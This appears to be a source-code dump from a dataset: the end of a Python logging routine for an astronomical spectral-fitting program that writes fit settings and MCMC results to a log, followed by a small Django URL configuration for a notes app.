logfile.write('\n-----------------------------------------------------------------------------------------------------------------')
logfile.write('\n')
# General fit options
logfile.write('\n{0:<30}{1:<30}{2:<30}'.format(' fit_options:','',''))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('fit_reg',':',str(fit_options['fit_reg']) ))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('good_thresh',':',str(fit_options['good_thresh']) ))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('mask_bad_pix',':',str(fit_options['mask_bad_pix']) ))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('n_basinhop',':',str(fit_options['n_basinhop']) ))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('test_outflows',':',str(fit_options['test_outflows']) ))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('test_line',':',str(fit_options['test_line']) ))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('max_like_niter',':',str(fit_options['max_like_niter']) ))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('output_pars',':',str(fit_options['output_pars']) ))
logfile.write('\n')
# MCMC options
if mcmc_options['mcmc_fit']==False:
logfile.write('\n{0:<30}{1:<30}{2:<30}'.format(' mcmc_options:','',''))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('','','MCMC fitting is turned off.' ))
logfile.write('\n')
elif mcmc_options['mcmc_fit']==True:
logfile.write('\n{0:<30}{1:<30}{2:<30}'.format(' mcmc_options:','',''))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('mcmc_fit',':',str(mcmc_options['mcmc_fit']) ))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('nwalkers',':',str(mcmc_options['nwalkers']) ))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('auto_stop',':',str(mcmc_options['auto_stop']) ))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('conv_type',':',str(mcmc_options['conv_type']) ))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('min_samp',':',str(mcmc_options['min_samp']) ))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('ncor_times',':',str(mcmc_options['ncor_times']) ))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('autocorr_tol',':',str(mcmc_options['autocorr_tol']) ))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('write_iter',':',str(mcmc_options['write_iter']) ))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('write_thresh',':',str(mcmc_options['write_thresh']) ))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('burn_in',':',str(mcmc_options['burn_in']) ))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('min_iter',':',str(mcmc_options['min_iter']) ))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('max_iter',':',str(mcmc_options['max_iter']) ))
logfile.write('\n')
# Fit Component options
logfile.write('\n{0:<30}{1:<30}{2:<30}'.format(' comp_options:','',''))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('fit_opt_feii',':',str(comp_options['fit_opt_feii']) ))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('fit_uv_iron',':',str(comp_options['fit_uv_iron']) ))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('fit_balmer',':',str(comp_options['fit_balmer']) ))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('fit_losvd',':',str(comp_options['fit_losvd']) ))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('fit_host',':',str(comp_options['fit_host']) ))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('fit_power',':',str(comp_options['fit_power']) ))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('fit_poly',':',str(comp_options['fit_poly']) ))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('fit_narrow',':',str(comp_options['fit_narrow']) ))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('fit_broad',':',str(comp_options['fit_broad']) ))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('fit_outflow',':',str(comp_options['fit_outflow']) ))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('fit_absorp',':',str(comp_options['fit_absorp']) ))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('tie_line_fwhm',':',str(comp_options['tie_line_fwhm']) ))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('tie_line_voff',':',str(comp_options['tie_line_voff']) ))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('na_line_profile',':',str(comp_options['na_line_profile']) ))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('br_line_profile',':',str(comp_options['br_line_profile']) ))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('out_line_profile',':',str(comp_options['out_line_profile']) ))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('abs_line_profile',':',str(comp_options['abs_line_profile']) ))
logfile.write('\n')
# LOSVD options
if comp_options["fit_losvd"]==True:
logfile.write('\n{0:<30}{1:<30}{2:<30}'.format(' losvd_options:','',''))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('library',':',str(losvd_options['library']) ))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('vel_const',':',str(losvd_options['vel_const']) ))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('disp_const',':',str(losvd_options['disp_const']) ))
logfile.write('\n')
elif comp_options["fit_losvd"]==False:
logfile.write('\n{0:<30}{1:<30}{2:<30}'.format(' losvd_options:','',''))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('','','Stellar LOSVD fitting is turned off.' ))
logfile.write('\n')
# Host Options
if comp_options["fit_host"]==True:
logfile.write('\n{0:<30}{1:<30}{2:<30}'.format(' host_options:','',''))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('age',':',str(host_options['age']) ))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('vel_const',':',str(host_options['vel_const']) ))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('disp_const',':',str(host_options['disp_const']) ))
logfile.write('\n')
elif comp_options["fit_host"]==False:
logfile.write('\n{0:<30}{1:<30}{2:<30}'.format(' host_options:','',''))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('','','Host-galaxy template component is turned off.' ))
logfile.write('\n')
# Power-law continuum options
if comp_options['fit_power']==True:
logfile.write('\n{0:<30}{1:<30}{2:<30}'.format(' power_options:','',''))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('type',':',str(power_options['type']) ))
logfile.write('\n')
elif comp_options["fit_power"]==False:
logfile.write('\n{0:<30}{1:<30}{2:<30}'.format(' power_options:','',''))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('','','Power Law component is turned off.' ))
logfile.write('\n')
# Polynomial continuum options
if comp_options['fit_poly']==True:
logfile.write('\n{0:<30}{1:<30}{2:<30}'.format(' poly_options:','',''))
logfile.write('\n{0:>30}{1:<2}{2:<100}'.format('ppoly',':','bool: %s, order: %s' % (str(poly_options['ppoly']['bool']),str(poly_options['ppoly']['order']) )))
logfile.write('\n{0:>30}{1:<2}{2:<100}'.format('apoly',':','bool: %s, order: %s' % (str(poly_options['apoly']['bool']),str(poly_options['apoly']['order']),)))
logfile.write('\n{0:>30}{1:<2}{2:<100}'.format('mpoly',':','bool: %s, order: %s' % (str(poly_options['mpoly']['bool']),str(poly_options['mpoly']['order']),)))
logfile.write('\n')
elif comp_options["fit_poly"]==False:
logfile.write('\n{0:<30}{1:<30}{2:<30}'.format(' poly_options:','',''))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('','','Polynomial continuum component is turned off.' ))
logfile.write('\n')
# Optical FeII fitting options
if (comp_options['fit_opt_feii']==True):
logfile.write('\n{0:<30}{1:<30}{2:<30}'.format(' opt_feii_options:','',''))
if (comp_options['fit_opt_feii']==True) and (opt_feii_options['opt_template']['type']=='VC04'):
logfile.write('\n{0:>30}{1:<2}{2:<100}'.format('opt_template:',':','type: %s' % str(opt_feii_options['opt_template']['type']) ))
logfile.write('\n{0:>30}{1:<2}{2:<100}'.format('opt_amp_const',':','bool: %s, br_opt_feii_val: %s, na_opt_feii_val: %s' % (str(opt_feii_options['opt_amp_const']['bool']),str(opt_feii_options['opt_amp_const']['br_opt_feii_val']),str(opt_feii_options['opt_amp_const']['na_opt_feii_val']))))
logfile.write('\n{0:>30}{1:<2}{2:<100}'.format('opt_fwhm_const',':','bool: %s, br_opt_feii_val: %s, na_opt_feii_val: %s' % (str(opt_feii_options['opt_fwhm_const']['bool']),str(opt_feii_options['opt_fwhm_const']['br_opt_feii_val']),str(opt_feii_options['opt_fwhm_const']['na_opt_feii_val']))))
logfile.write('\n{0:>30}{1:<2}{2:<100}'.format('opt_voff_const',':','bool: %s, br_opt_feii_val: %s, na_opt_feii_val: %s' % (str(opt_feii_options['opt_voff_const']['bool']),str(opt_feii_options['opt_voff_const']['br_opt_feii_val']),str(opt_feii_options['opt_voff_const']['na_opt_feii_val']))))
if (comp_options['fit_opt_feii']==True) and (opt_feii_options['opt_template']['type']=='K10'):
logfile.write('\n{0:>30}{1:<2}{2:<100}'.format('opt_template:',':','type: %s' % str(opt_feii_options['opt_template']['type']) ))
logfile.write('\n{0:>30}{1:<2}{2:<100}'.format('opt_amp_const',':','bool: %s, f_feii_val: %s, s_feii_val: %s, g_feii_val: %s, z_feii_val: %s' % (str(opt_feii_options['opt_amp_const']['bool']),str(opt_feii_options['opt_amp_const']['f_feii_val']),str(opt_feii_options['opt_amp_const']['s_feii_val']),str(opt_feii_options['opt_amp_const']['g_feii_val']),str(opt_feii_options['opt_amp_const']['z_feii_val']))))
logfile.write('\n{0:>30}{1:<2}{2:<100}'.format('opt_fwhm_const',':','bool: %s, opt_feii_val: %s' % (str(opt_feii_options['opt_fwhm_const']['bool']),str(opt_feii_options['opt_fwhm_const']['opt_feii_val']),)))
logfile.write('\n{0:>30}{1:<2}{2:<100}'.format('opt_voff_const',':','bool: %s, opt_feii_val: %s' % (str(opt_feii_options['opt_voff_const']['bool']),str(opt_feii_options['opt_voff_const']['opt_feii_val']),)))
logfile.write('\n{0:>30}{1:<2}{2:<100}'.format('opt_temp_const',':','bool: %s, opt_feii_val: %s' % (str(opt_feii_options['opt_temp_const']['bool']),str(opt_feii_options['opt_temp_const']['opt_feii_val']),)))
elif comp_options["fit_opt_feii"]==False:
logfile.write('\n{0:<30}{1:<30}{2:<30}'.format(' opt_feii_options:','',''))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('','','Optical FeII fitting is turned off.' ))
logfile.write('\n')
# UV Iron options
if (comp_options['fit_uv_iron']==True):
logfile.write('\n{0:<30}{1:<30}{2:<30}'.format(' uv_iron_options:','',''))
logfile.write('\n{0:>30}{1:<2}{2:<100}'.format('uv_amp_const',':','bool: %s, uv_iron_val: %s' % (str(uv_iron_options['uv_amp_const']['bool']),str(uv_iron_options['uv_amp_const']['uv_iron_val']) )))
logfile.write('\n{0:>30}{1:<2}{2:<100}'.format('uv_fwhm_const',':','bool: %s, uv_iron_val: %s' % (str(uv_iron_options['uv_fwhm_const']['bool']),str(uv_iron_options['uv_fwhm_const']['uv_iron_val']),)))
logfile.write('\n{0:>30}{1:<2}{2:<100}'.format('uv_voff_const',':','bool: %s, uv_iron_val: %s' % (str(uv_iron_options['uv_voff_const']['bool']),str(uv_iron_options['uv_voff_const']['uv_iron_val']),)))
elif comp_options["fit_uv_iron"]==False:
logfile.write('\n{0:<30}{1:<30}{2:<30}'.format(' uv_iron_options:','',''))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('','','UV Iron fitting is turned off.' ))
logfile.write('\n')
# Balmer options
if (comp_options['fit_balmer']==True):
logfile.write('\n{0:<30}{1:<30}{2:<30}'.format(' balmer_options:','',''))
logfile.write('\n{0:>30}{1:<2}{2:<100}'.format('R_const',':','bool: %s, R_val: %s' % (str(balmer_options['R_const']['bool']),str(balmer_options['R_const']['R_val']) )))
logfile.write('\n{0:>30}{1:<2}{2:<100}'.format('balmer_amp_const',':','bool: %s, balmer_amp_val: %s' % (str(balmer_options['balmer_amp_const']['bool']),str(balmer_options['balmer_amp_const']['balmer_amp_val']),)))
logfile.write('\n{0:>30}{1:<2}{2:<100}'.format('balmer_fwhm_const',':','bool: %s, balmer_fwhm_val: %s' % (str(balmer_options['balmer_fwhm_const']['bool']),str(balmer_options['balmer_fwhm_const']['balmer_fwhm_val']),)))
logfile.write('\n{0:>30}{1:<2}{2:<100}'.format('balmer_voff_const',':','bool: %s, balmer_voff_val: %s' % (str(balmer_options['balmer_voff_const']['bool']),str(balmer_options['balmer_voff_const']['balmer_voff_val']),)))
logfile.write('\n{0:>30}{1:<2}{2:<100}'.format('Teff_const',':','bool: %s, Teff_val: %s' % (str(balmer_options['Teff_const']['bool']),str(balmer_options['Teff_const']['Teff_val']),)))
logfile.write('\n{0:>30}{1:<2}{2:<100}'.format('tau_const',':','bool: %s, tau_val: %s' % (str(balmer_options['tau_const']['bool']),str(balmer_options['tau_const']['tau_val']),)))
elif comp_options["fit_balmer"]==False:
logfile.write('\n{0:<30}{1:<30}{2:<30}'.format(' balmer_options:','',''))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('','','Balmer pseudo-continuum fitting is turned off.' ))
logfile.write('\n')
# Plotting options
logfile.write('\n{0:<30}{1:<30}{2:<30}'.format(' plot_options:','',''))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('plot_param_hist',':',str(plot_options['plot_param_hist']) ))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('plot_flux_hist',':',str(plot_options['plot_flux_hist']) ))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('plot_lum_hist',':',str(plot_options['plot_lum_hist']) ))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('plot_eqwidth_hist',':',str(plot_options['plot_eqwidth_hist']) ))
# Output options
logfile.write('\n{0:<30}{1:<30}{2:<30}'.format(' output_options:','',''))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('write_chain',':',str(output_options['write_chain']) ))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('verbose',':',str(output_options['verbose']) ))
#
logfile.write('\n')
logfile.write('\n-----------------------------------------------------------------------------------------------------------------')
return None
if (output_type=='update_opt_feii'):
with log_file_path.open(mode='a') as logfile:
logfile.write('\n')
logfile.write('\n * Optical FeII templates are outside of the fitting region and have been disabled.')
return None
if (output_type=='update_uv_iron'):
with log_file_path.open(mode='a') as logfile:
logfile.write('\n')
logfile.write('\n * UV iron template is outside of the fitting region and has been disabled.')
return None
if (output_type=='update_balmer'):
with log_file_path.open(mode='a') as logfile:
logfile.write('\n')
logfile.write('\n * Balmer continuum template is outside of the fitting region and has been disabled.')
return None
if (output_type=='output_line_list'):
line_list, param_dict, soft_cons = output_val
with log_file_path.open(mode='a') as logfile:
logfile.write("\n----------------------------------------------------------------------------------------------------------------------------------------")
logfile.write("\n Line List:")
nfree = 0
logfile.write("\n----------------------------------------------------------------------------------------------------------------------------------------")
for line in sorted(list(line_list)):
logfile.write("\n{0:<30}{1:<30}{2:<30.2}".format(line, '',''))
for par in sorted(list(line_list[line])):
logfile.write("\n{0:<30}{1:<30}{2:<30}".format('', par,str(line_list[line][par])))
if line_list[line][par]=="free": nfree+=1
logfile.write("\n----------------------------------------------------------------------------------------------------------------------------------------")
logfile.write("\n Soft Constraints:\n")
for con in soft_cons:
logfile.write("\n{0:>30}{1:<0}{2:<0}".format(con[0], ' > ',con[1]))
logfile.write("\n----------------------------------------------------------------------------------------------------------------------------------------")
return None
if (output_type=='no_line_test'):
rdict = output_val
with log_file_path.open(mode='a') as logfile:
logfile.write('\n')
logfile.write('\n### No-Line Model Fitting Results ###')
logfile.write('\n-----------------------------------------------------------------------------------------------------------------')
logfile.write('\n{0:<30}{1:<30}{2:<30}{3:<30}'.format('Parameter','Best-fit Value','+/- 1-sigma','Flag'))
logfile.write('\n-----------------------------------------------------------------------------------------------------------------')
# Sort into arrays
pname = []
med = []
std = []
flag = []
for key in rdict:
pname.append(key)
med.append(rdict[key]['med'])
std.append(rdict[key]['std'])
flag.append(rdict[key]['flag'])
i_sort = np.argsort(pname)
pname = np.array(pname)[i_sort]
med = np.array(med)[i_sort]
std = np.array(std)[i_sort]
flag = np.array(flag)[i_sort]
for i in range(0,len(pname),1):
logfile.write('\n{0:<30}{1:<30.4f}{2:<30.4f}{3:<30}'.format(pname[i], med[i], std[i], flag[i]))
logfile.write('\n-----------------------------------------------------------------------------------------------------------------')
return None
if (output_type=='line_test'):
rdict = output_val
with log_file_path.open(mode='a') as logfile:
logfile.write('\n')
logfile.write('\n### Line Model Fitting Results ###')
logfile.write('\n-----------------------------------------------------------------------------------------------------------------')
logfile.write('\n{0:<30}{1:<30}{2:<30}{3:<30}'.format('Parameter','Best-fit Value','+/- 1-sigma','Flag'))
logfile.write('\n-----------------------------------------------------------------------------------------------------------------')
# Sort into arrays
pname = []
med = []
std = []
flag = []
for key in rdict:
pname.append(key)
med.append(rdict[key]['med'])
std.append(rdict[key]['std'])
flag.append(rdict[key]['flag'])
i_sort = np.argsort(pname)
pname = np.array(pname)[i_sort]
med = np.array(med)[i_sort]
std = np.array(std)[i_sort]
flag = np.array(flag)[i_sort]
for i in range(0,len(pname),1):
logfile.write('\n{0:<30}{1:<30.4f}{2:<30.4f}{3:<30}'.format(pname[i], med[i], std[i], flag[i]))
logfile.write('\n-----------------------------------------------------------------------------------------------------------------')
return None
if (output_type=='line_test_stats'):
(pval, pval_upp, pval_low, conf, conf_upp, conf_low, dist, disp, signif, overlap,
f_conf,f_conf_err,f_stat,f_stat_err,f_pval,f_pval_err,
chi2_ratio,chi2_ratio_err,chi2_no_line,chi2_no_line_err,chi2_line,chi2_line_err,
# amp_metric,fwhm_metric,voff_metric,voff_metric_err,
ssr_ratio,ssr_ratio_err,ssr_no_line,ssr_no_line_err,ssr_line,ssr_line_err,
median_noise, median_noise_err,
total_resid_noise,total_resid_noise_err,resid_noise_no_line,resid_noise_no_line_err,resid_noise_line,resid_noise_line_err) = output_val
with log_file_path.open(mode='a') as logfile:
logfile.write('\n')
# logfile.write('-----------------------------------------------------------------------------------------------------')
logfile.write('\n Line Test Statistics:')
logfile.write('\n-----------------------------------------------------------------------------------------------------')
logfile.write('\n{0:<30}{1:<30}{2:<30}{3:<30}'.format('','Statistic','Value','Uncertainty') )
logfile.write('\n-----------------------------------------------------------------------------------------------------')
logfile.write('\n{0:<30}'.format('A/B Likelihood Test:'))
logfile.write('\n{0:<30}{1:<30}{2:<30.6f}{3:<30}'.format('','Confidence:',conf,"(-%0.6f,+%0.6f)" % (conf_low,conf_upp )) )
logfile.write('\n{0:<30}{1:<30}{2:<30.6f}{3:<30}'.format('','p-value:',pval,"(-%0.6f,+%0.6f)" % (pval_low,pval_upp)))
logfile.write('\n{0:<30}{1:<30}{2:<30.6f}'.format('','Statistical Distance:',dist))
logfile.write('\n{0:<30}{1:<30}{2:<30.6f}'.format('','Dispersion:',disp))
logfile.write('\n{0:<30}{1:<30}{2:<30.6f}'.format('','Significance (sigma):',signif))
logfile.write('\n{0:<30}{1:<30}{2:<30.6f}'.format('','Overlap (1-sigma):',overlap))
logfile.write('\n{0:<30}'.format('ANOVA (F-test):'))
logfile.write('\n{0:<30}{1:<30}{2:<30.4f}{3:<30.4f}'.format('','Confidence:',f_conf, f_conf_err ) )
logfile.write('\n{0:<30}{1:<30}{2:<30.4f}{3:<30.4f}'.format('','F-statistic:',f_stat,f_stat_err))
logfile.write('\n{0:<30}{1:<30}{2:<30.4e}{3:<30.4e}'.format('','p-value:',f_pval,f_pval_err))
logfile.write('\n{0:<30}'.format('Chi-Squared Metrics:'))
logfile.write('\n{0:<30}{1:<30}{2:<30.6f}{3:<30.6f}'.format('','Chi-squared Ratio:',chi2_ratio, chi2_ratio_err ) )
logfile.write('\n{0:<30}{1:<30}{2:<30.6f}{3:<30.6f}'.format('','Chi-squared no-line:',chi2_no_line,chi2_no_line_err))
logfile.write('\n{0:<30}{1:<30}{2:<30.6f}{3:<30.6f}'.format('','Chi-squared line:',chi2_line,chi2_line_err))
logfile.write('\n{0:<30}'.format('Sum-of-Squares of Residuals (SSR):'))
logfile.write('\n{0:<30}{1:<30}{2:<30.6f}{3:<30.6f}'.format('','SSR ratio:',ssr_ratio,ssr_ratio_err))
logfile.write('\n{0:<30}{1:<30}{2:<30.6f}{3:<30.6f}'.format('','SSR no-line:',ssr_no_line,ssr_no_line_err))
logfile.write('\n{0:<30}{1:<30}{2:<30.6f}{3:<30.6f}'.format('','SSR line:',ssr_line,ssr_line_err))
logfile.write('\n{0:<30}'.format('Residual Noise:'))
logfile.write('\n{0:<30}{1:<30}{2:<30.6f}{3:<30.6f}'.format('','Median spec noise:',median_noise, median_noise_err))
logfile.write('\n{0:<30}{1:<30}{2:<30.6f}{3:<30.6f}'.format('','Total resid noise:',total_resid_noise,total_resid_noise_err))
logfile.write('\n{0:<30}{1:<30}{2:<30.6f}{3:<30.6f}'.format('','no-line resid:',resid_noise_no_line,resid_noise_no_line_err))
logfile.write('\n{0:<30}{1:<30}{2:<30.6f}{3:<30.6f}'.format('','line resid:',resid_noise_line,resid_noise_line_err))
logfile.write('\n-----------------------------------------------------------------------------------------------------')
return None
# Maximum likelihood/Initial parameters
if (output_type=='max_like_fit'):
pdict,noise_std,resid_std = output_val
with log_file_path.open(mode='a') as logfile:
logfile.write('\n')
logfile.write('\n### Maximum Likelihood Fitting Results ###')
logfile.write('\n-----------------------------------------------------------------------------------------------------------------')
if "std" in pdict[list(pdict.keys())[0]]:
logfile.write('\n{0:<30}{1:<30}{2:<30}{3:<30}'.format('Parameter','Max. Like. Value','+/- 1-sigma', 'Flag') )
else:
logfile.write('\n{0:<30}{1:<30}'.format('Parameter','Max. Like. Value') )
logfile.write('\n-----------------------------------------------------------------------------------------------------------------')
# Sort into arrays
pname = []
med = []
std = []
flag = []
for key in pdict:
pname.append(key)
med.append(pdict[key]['med'])
if "std" in pdict[list(pdict.keys())[0]]:
std.append(pdict[key]['std'])
flag.append(pdict[key]['flag'])
i_sort = np.argsort(pname)
pname = np.array(pname)[i_sort]
med = np.array(med)[i_sort]
if "std" in pdict[list(pdict.keys())[0]]:
std = np.array(std)[i_sort]
flag = np.array(flag)[i_sort]
for i in range(0,len(pname),1):
if "std" in pdict[list(pdict.keys())[0]]:
logfile.write('\n{0:<30}{1:<30.4f}{2:<30.4f}{3:<30}'.format(pname[i], med[i], std[i], flag[i]))
else:
logfile.write('\n{0:<30}{1:<30.4f}'.format(pname[i], med[i]))
logfile.write('\n{0:<30}{1:<30.4f}'.format('NOISE_STD', noise_std ))
logfile.write('\n{0:<30}{1:<30.4f}'.format('RESID_STD', resid_std ))
logfile.write('\n-----------------------------------------------------------------------------------------------------------------')
return None
# run_emcee
if (output_type=='emcee_options'): # write user input emcee options
ndim,nwalkers,auto_stop,conv_type,burn_in,write_iter,write_thresh,min_iter,max_iter = output_val
# write_log((ndim,nwalkers,auto_stop,burn_in,write_iter,write_thresh,min_iter,max_iter),40)
a = str(datetime.datetime.now())
with log_file_path.open(mode='a') as logfile:
logfile.write('\n')
logfile.write('\n### Emcee Options ###')
logfile.write('\n-----------------------------------------------------------------------------------------------------------------')
logfile.write('\n{0:<30}{1:<30}'.format('ndim' , ndim ))
logfile.write('\n{0:<30}{1:<30}'.format('nwalkers' , nwalkers ))
logfile.write('\n{0:<30}{1:<30}'.format('auto_stop' , str(auto_stop) ))
logfile.write('\n{0:<30}{1:<30}'.format('user burn_in', burn_in ))
logfile.write('\n{0:<30}{1:<30}'.format('write_iter' , write_iter ))
logfile.write('\n{0:<30}{1:<30}'.format('write_thresh', write_thresh ))
logfile.write('\n{0:<30}{1:<30}'.format('min_iter' , min_iter ))
logfile.write('\n{0:<30}{1:<30}'.format('max_iter' , max_iter ))
logfile.write('\n{0:<30}{1:<30}'.format('start_time' , a ))
logfile.write('\n-----------------------------------------------------------------------------------------------------------------')
return None
if (output_type=='autocorr_options'): # write user input auto_stop options
min_samp,autocorr_tol,ncor_times,conv_type = output_val
with log_file_path.open(mode='a') as logfile:
# write_log((min_samp,tol,ntol,atol,ncor_times,conv_type),41,run_dir)
logfile.write('\n')
logfile.write('\n### Autocorrelation Options ###')
logfile.write('\n-----------------------------------------------------------------------------------------------------------------')
logfile.write('\n{0:<30}{1:<30}'.format('min_samp' , min_samp ))
logfile.write('\n{0:<30}{1:<30}'.format('tolerance%', autocorr_tol ))
logfile.write('\n{0:<30}{1:<30}'.format('ncor_times', ncor_times ))
logfile.write('\n{0:<30}{1:<30}'.format('conv_type' , str(conv_type) ))
logfile.write('\n-----------------------------------------------------------------------------------------------------------------')
return None
if (output_type=='autocorr_results'): # write autocorrelation results to log
# write_log((k+1,burn_in,stop_iter,param_names,tau),42,run_dir)
burn_in,stop_iter,param_names,tau,autocorr_tol,tol,ncor_times = output_val
with log_file_path.open(mode='a') as logfile:
# write_log((min_samp,tol,ntol,atol,ncor_times,conv_type),41,run_dir)
i_sort = np.argsort(param_names)
param_names = np.array(param_names)[i_sort]
tau = np.array(tau)[i_sort]
tol = np.array(tol)[i_sort]
logfile.write('\n')
logfile.write('\n### Autocorrelation Results ###')
logfile.write('\n-----------------------------------------------------------------------------------------------------------------')
logfile.write('\n{0:<30}{1:<30}'.format('conv iteration', burn_in ))
logfile.write('\n{0:<30}{1:<30}'.format('stop iteration', stop_iter ))
logfile.write('\n-----------------------------------------------------------------------------------------------------------------')
logfile.write('\n{0:<30}{1:<30}{2:<30}{3:<30}{4:<30}'.format('Parameter','Autocorr. Time','Target Autocorr. Time','Tolerance','Converged?'))
logfile.write('\n-----------------------------------------------------------------------------------------------------------------')
for i in range(0,len(param_names),1):
if (burn_in > (tau[i]*ncor_times)) and (0 < tol[i] < autocorr_tol):
    c = 'True'
else:
    c = 'False'
logfile.write('\n{0:<30}{1:<30.5f}{2:<30.5f}{3:<30.5f}{4:<30}'.format(param_names[i],tau[i],(tau[i]*ncor_times),tol[i],c))
logfile.write('\n-----------------------------------------------------------------------------------------------------------------')
return None
if (output_type=='emcee_time'): # write autocorrelation results to log
# write_log(run_time,43,run_dir)
run_time = output_val
a = str(datetime.datetime.now())
with log_file_path.open(mode='a') as logfile:
# write_log((min_samp,tol,ntol,atol,ncor_times,conv_type),41,run_dir)
logfile.write('\n{0:<30}{1:<30}'.format('end_time', a ))
logfile.write('\n{0:<30}{1:<30}'.format('emcee_runtime',run_time ))
logfile.write('\n-----------------------------------------------------------------------------------------------------------------')
return None
if (output_type=='emcee_results'): # write best fit parameters results to log
par_names,par_best,ci_68_low,ci_68_upp,ci_95_low,ci_95_upp,mean,std_dev,median,med_abs_dev,flags = output_val
# write_log((par_names,par_best,sig_low,sig_upp),50,run_dir)
with log_file_path.open(mode='a') as logfile:
logfile.write('\n')
logfile.write('\n### Best-fit Parameters & Uncertainties ###')
logfile.write('\n-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------')
logfile.write('\n{0:<30}{1:<16}{2:<16}{3:<16}{4:<16}{5:<16}{6:<16}{7:<16}{8:<16}{9:<16}{10:<16}'.format('Parameter','Best-fit Value','68% CI low','68% CI upp','95% CI low','95% CI upp','Mean','Std. Dev.','Median','Med. Abs. Dev.','Flag'))
logfile.write('\n-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------')
for par in range(0,len(par_names),1):
logfile.write('\n{0:<30}{1:<16.5f}{2:<16.5f}{3:<16.5f}{4:<16.5f}{5:<16.5f}{6:<16.5f}{7:<16.5f}{8:<16.5f}{9:<16.5f}{10:<16.5f}'.format(par_names[par],par_best[par],ci_68_low[par],ci_68_upp[par],ci_95_low[par],ci_95_upp[par],mean[par],std_dev[par],median[par],med_abs_dev[par],flags[par]))
logfile.write('\n-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------')
return None
# Total runtime
if (output_type=='total_time'): # write total time to log
# write_log(run_time,43,run_dir)
tot_time = output_val
a = str(datetime.datetime.now())
with log_file_path.open(mode='a') as logfile:
# write_log((min_samp,tol,ntol,atol,ncor_times,conv_type),41,run_dir)
logfile.write('\n{0:<30}{1:<30}'.format('total_runtime',time_convert(tot_time) ))
logfile.write('\n{0:<30}{1:<30}'.format('end_time',a ))
logfile.write('\n-----------------------------------------------------------------------------------------------------------------')
return None
return None
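# Usage sketch (illustrative): each call appends one formatted block to
# run_dir/log/log_file.txt, e.g.
#   write_log(run_time, 'emcee_time', run_dir)      # after MCMC sampling finishes
#   write_log(total_time, 'total_time', run_dir)    # at the very end of a run
# where run_dir is the pathlib.Path of the BADASS run directory.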
##################################################################################
| 52.703284
| 422
| 0.555167
|
17242f4e9686c30f4fa1ca40ff3bf0ed67f7aaa3
| 409
|
py
|
Python
|
django/notes/usr/urls.py
|
AgbaD/apis
|
e88ecd11820651c8fa5d670ed21ca55ebd8877c2
|
[
"MIT"
] | null | null | null |
django/notes/usr/urls.py
|
AgbaD/apis
|
e88ecd11820651c8fa5d670ed21ca55ebd8877c2
|
[
"MIT"
] | null | null | null |
django/notes/usr/urls.py
|
AgbaD/apis
|
e88ecd11820651c8fa5d670ed21ca55ebd8877c2
|
[
"MIT"
] | null | null | null |
from django.urls import path
from . import views
urlpatterns = [
path('dash/', views.dash, name='dash'),
path('personal_notes/', views.get_private_notes, name='get_private_notes'),
path('create_note/', views.create_note, name='create_note'),
path('delete_note/<str:public_id>/', views.delete_note, name='delete_note'),
path('get_note/<str:public_id>/', views.get_note, name='get_note')
]
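# Usage sketch (illustrative): these named routes can be resolved in views or
# tests with django.urls.reverse, e.g.
#   reverse('get_note', args=['<public_id>'])
#   reverse('create_note')
# The full URL prefix depends on how the project-level urls.py includes this app.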
| 37.181818
| 80
| 0.706601
|
